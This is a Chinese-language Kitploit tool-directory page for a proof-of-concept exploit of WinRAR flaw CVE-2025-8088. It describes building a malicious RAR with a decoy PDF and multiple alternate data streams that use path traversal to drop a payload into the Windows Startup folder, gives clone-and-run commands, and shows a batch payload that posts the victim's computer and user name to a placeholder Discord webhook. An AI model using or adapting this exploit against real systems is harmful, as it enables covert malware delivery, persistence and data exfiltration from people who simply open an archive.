Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-8088-Exploit — WinRAR 漏洞(CVE-2025-8088)的概念验证利用程序,影响版本 7.12 及更低版本。该工具创建一个恶意 RAR 存档,将有效载荷嵌入具有路径遍历的备用数据流(ADS)中,可能导致任意代码执行。 | Kitploit
工具/GitHubGitHub/techcorp/cve-2025-8088-exploit
Payload生成漏洞利用Web应用程序漏洞利用渗透测试红队二进制利用
GitHubtechcorp/cve-2025-8088-exploit

CVE-2025-8088-Exploit

WinRAR 漏洞(CVE-2025-8088)的概念验证利用程序,影响版本 7.12 及更低版本。该工具创建一个恶意 RAR 存档,将有效载荷嵌入具有路径遍历的备用数据流(ADS)中,可能导致任意代码执行。

查看仓库
9个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-8088 WinRAR 漏洞利用 🔓

这是针对影响 7.12 及更低版本的 WinRAR 漏洞(CVE-2025-8088)的概念验证漏洞利用程序。该工具会创建一个恶意 RAR 压缩包,通过路径遍历将载荷嵌入备用数据流(ADS),可能导致任意代码执行。

  • 其他许多利用程序的通病是它们没有嵌入多个 ADS 流,要么需要碰运气命中正确的路径遍历,要么需要知道确切的用户名/解压目录。

🚀 工作原理

  1. 创建诱饵文档 📄 - 生成外观专业的 PDF(简历或渗透测试报告)
  2. 嵌入多个 ADS 流 🔄 - 附加具有不同路径遍历深度的载荷流
  3. 篡改 RAR 头部 ⚙️ - 修改归档结构以利用路径遍历漏洞
  4. 将载荷投放至启动文件夹 📂 - 解压时尝试将载荷写入 Windows 启动文件夹

🛠️ 使用方法

root@kitploit:~
# 克隆仓库
git clone https://github.com/techcorp/CVE-2025-8088-Exploit.git
cd best-CVE-2025-8088

# 安装依赖
pip install reportlab

# 运行漏洞利用程序
python CVE-2025-8088.py

✏️ 载荷自定义

编辑载荷以调用 Discord webhook:

root@kitploit:~
# 替换脚本中的 PAYLOAD 变量:
PAYLOAD = """@echo off
curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"Extracted on %COMPUTERNAME% by %USERNAME%\"}" YOUR_DISCORD_WEBHOOK_URL
pause
"""

将 YOUR_DISCORD_WEBHOOK_URL 替换为你实际的 webhook URL。

🔄 执行流程

  1. 受害者使用存在漏洞的 WinRAR(≤7.12)解压该 RAR 文件
  2. 载荷被写入启动文件夹:
    root@kitploit:~
    AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
    
  3. 下次重启时 ➡️ 载荷自动执行

📋 环境要求

  • Windows 操作系统 🪟
  • Python 3.x 🐍
  • 已安装 WinRAR
  • ReportLab 库(pip install reportlab)
下载工具